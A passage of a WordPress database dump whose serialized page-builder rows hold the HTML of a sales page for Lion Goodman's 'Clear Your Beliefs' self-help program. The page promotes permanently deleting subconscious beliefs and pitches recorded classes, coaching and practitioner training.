magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2893:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li><em style="margin-left: -6px;">What do I want to experience?</em></li>\n	<li><em style="margin-left: -6px;">What belief is creating this experience I don''t want?</em></li>\n	<li><em style="margin-left: -6px;">How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:561:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center; margin: 0px 5%;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;">[su_button url="http://www.clearbeliefs.com" target="_blank" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p>\n\n\n<hr id="lines"/>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1873, 2161, '_wp_page_template', 'page-templates/full-width.php'),
(1874, 2161, 'rt_custom_css', '');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1875, 2161, 'panels_data', 'a:3:{s:7:"widgets";a:3:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:825:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n<div class="quot" style="text-align: center; margin: 0px auto ! important;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\n<div class="clear"></div>\n\n&nbsp;";s:6:"filter";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:63409:"\n\n<p>&nbsp;</p>\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.</p>\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<p>&nbsp;</p>\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;</p>\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!Take me to the program description,tell me about all the cool bonuses I''ll get,and how much it costs...</a></h1>\n<p>&nbsp;</p>\n<h1>Why Does This Happen?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p>\n<p>Neuroscientists call the brain''s ability to change over time "neuroplasticity."</p>\n<p>It can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n<p>&nbsp;</p>\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></p>\n<p>If you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<p>&nbsp;</p>\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a>Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p><strong>We literally create our reality with our beliefs.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.</p>\n<p>&nbsp;</p>\n<h1>Upgrade Your Human Operating System</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong></p>\n\n<strong><em>I''m not enough.</em></strong>\n<strong><em>I can''t do it.</em></strong>\n<strong><em>I''m not worthy.</em></strong>\n<strong><strong><em>I''ll never be like them.</em></strong></strong>\n<strong><em>I''m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There''s something wrong with me.</em></strong>\n<strong><em>I''m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.</p>\n<p><strong>Here''s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<p>&nbsp;</p>\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p>The same thing is true in your subconscious mind:</p>\n<p><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></p>\n<p><strong>It''s that simple.</strong></p>\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\n<p>When you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n\n<p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<p><strong> It''s that simple.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Beliefs Are Difficult To Change</h1>\n\n<p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p>\n\n<p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p>\n\n<p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p>\n\n<p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p>\n\n<p>&nbsp;</p>\n<h1>Why We React The Way We Do</h1>\n\n<p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p>\n\n<p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p>\n\n<p>\n</p>\nWhy did I say that?\nWhat''s wrong with me?\nWhy didn''t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<p><em></p>\n\n<p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\n\n<p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\n\n<p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n\n<p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p>\n\n<p><strong>Here''s why:</strong></p>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\n<p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p>\n\n<p>&nbsp;</p>\n<h1>Here''s Some Good News</h1>\n\n<strong><strong><strong>First: It''s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\n<p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p>\n\n<p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p>\n\n<h1>Imagine The Life You Desire</h1>\n\n<p><strong>Can you imagine this?</strong></p>\n<p><img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" /></p>\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n<p>&nbsp;</p>\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n\n<p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n<p>&nbsp;</p>\n<h1>Clear Whatever Is In The Way</h1>\n\n<p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Is This A Guaranteed Cure-All?</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n<p>&nbsp;</p>\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n<p>&nbsp;</p>\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p>\n\n<p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p>\n\n<p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p>\n\n<p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p>\n\n<h1>With This Methodology, You Can Finally:</h1>\n\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p>\n\n<p>&nbsp;</p>\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px;margin-bottom: 5px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n<p>In gratitude, and with warm wishes for your total success,</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a></p>\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n<p>&nbsp;</p>\n<h1>Register Today and Discover What''s Possible</h1>\n\n<p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p>\n\n<p>&nbsp;</p>\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<p><a 